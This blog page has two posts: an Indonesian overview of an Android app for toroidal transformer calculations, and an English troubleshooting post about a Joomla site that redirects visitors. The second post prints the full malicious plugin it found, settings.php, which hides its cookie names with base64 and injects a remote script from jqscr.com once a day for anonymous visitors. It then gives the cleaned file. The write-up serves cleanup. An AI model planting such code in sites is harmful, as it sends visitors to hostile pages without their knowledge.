Beranda
Rumus dan perhitungan trafo toroid dengan aplikasi "Calculate Toroidal Transformer"
- Details
- Written by: Administrator
- Hits: 11184
Buat temen temen yang ingin membuat trafo toroid sendiri, kalian bisa menggunakan aplikasi "Calculate Toroidal Transformer". Aplikasi ini bisa didownload langsung di play store.
atau bisa scan QR Code berikut ini :
Menu yang ada pada halaman utama aplikasi ini:
1. Rumus Lengkap
Pada bagian ini kita bisa menentukan :
- Daya maksimal Kern Trafo
- Daya Primer dan sekunder
- Arus Primer dan sekunder
- Gulungan per Volt
- Jumlah Lilitan primer dan sekunder
- Panjang lilitan primer dan sekunder yang dibutuhkan
- Berat lilitan primer dan sekunder yang dibutuhkan
Dengan memasukan input :
- Dia meter luar kern
- Diameter dalam kern
- Tinggi Kern
- Tegangan Sekunder
2. Rumus Kern
Pada bagian ini kita bisa menentukan :
- Daya maksimal Kern Trafo
- Berat Kern
Dengan memasukan input :
- Dia meter luar kern
- Diameter dalam kern
- Tinggi Kern
3. Rumus Berat Kabel
Pada bagian ini kita bisa menentukan :
- Berat Kabel
Dengan memasukan input :
- Panjang lilitan
- Diameter lilitan
- Jenis Bahan lilitan
4. Rumus Arus
Pada bagian ini kita bisa menentukan :
- Berat Kern Trafo yang dibutuhkan
- Arus Primer dan Sekunder
- Daya primer dan sekunder
- Diameter lilitan primer dan sekunder
Dengan memasukan input :
- Arus Sekunder Trafo yang di inginkan
- Tegangan sekunder yang di inginkan
- Tegangan primer.
5. Rumus Daya
Pada bagian ini kita bisa menentukan :
- Daya maksimal Kern Trafo
- Berat Kern
Dengan memasukan input :
- Daya primer dan sekunder trafo
Cukup sekian pembahasan tentang aplikasi Calculate Toroidal Transformer. Semoga bermanfaat, dan jika ada kesalahan saya mohon maaf. Terima kasih...
How to fix website redirect in first visit every day?
- Details
- Written by: Administrator
- Hits: 1224
How to fix website redirect in first visit every day?
Every time I visit the first website, the web is redirected to the site https://jqscr.com/xxxxxx
After I checked, the web source before being redirected, it turns out that the contents are as follows:
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXmzhSV3";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
........
</head>
.......
There are several scripts tucked into the head
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXmzhSV3";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
Then I look for the source of the script. After several days of searching the file manager, I finally found the source of the redirect script.
The script source is at: "/plugins/system/settings/settings.php"
The contents of the settings.php are as follows:
<?php
defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin
{
public function onAfterInitialise()
{
$user = JFactory::getUser();
$mainframe = JFactory::getApplication();
if ( $user -> id > 0 ) {
// user route
} else {
// non-user route
$current_url = JUri::getInstance();
if (stristr($current_url, "/admin")) {
// admin-panel route
} else {
if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
echo '
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXxxxXXn";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
}
}
}
}
}
To solve the redirect problem, delete some scripts in the settings.php file so that it looks like the following:
<?php
defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin
{
public function onAfterInitialise()
{
$user = JFactory::getUser();
$mainframe = JFactory::getApplication();
}
}
Then deactivate the plugin settings in your Joomla administrator.
Page 3 of 3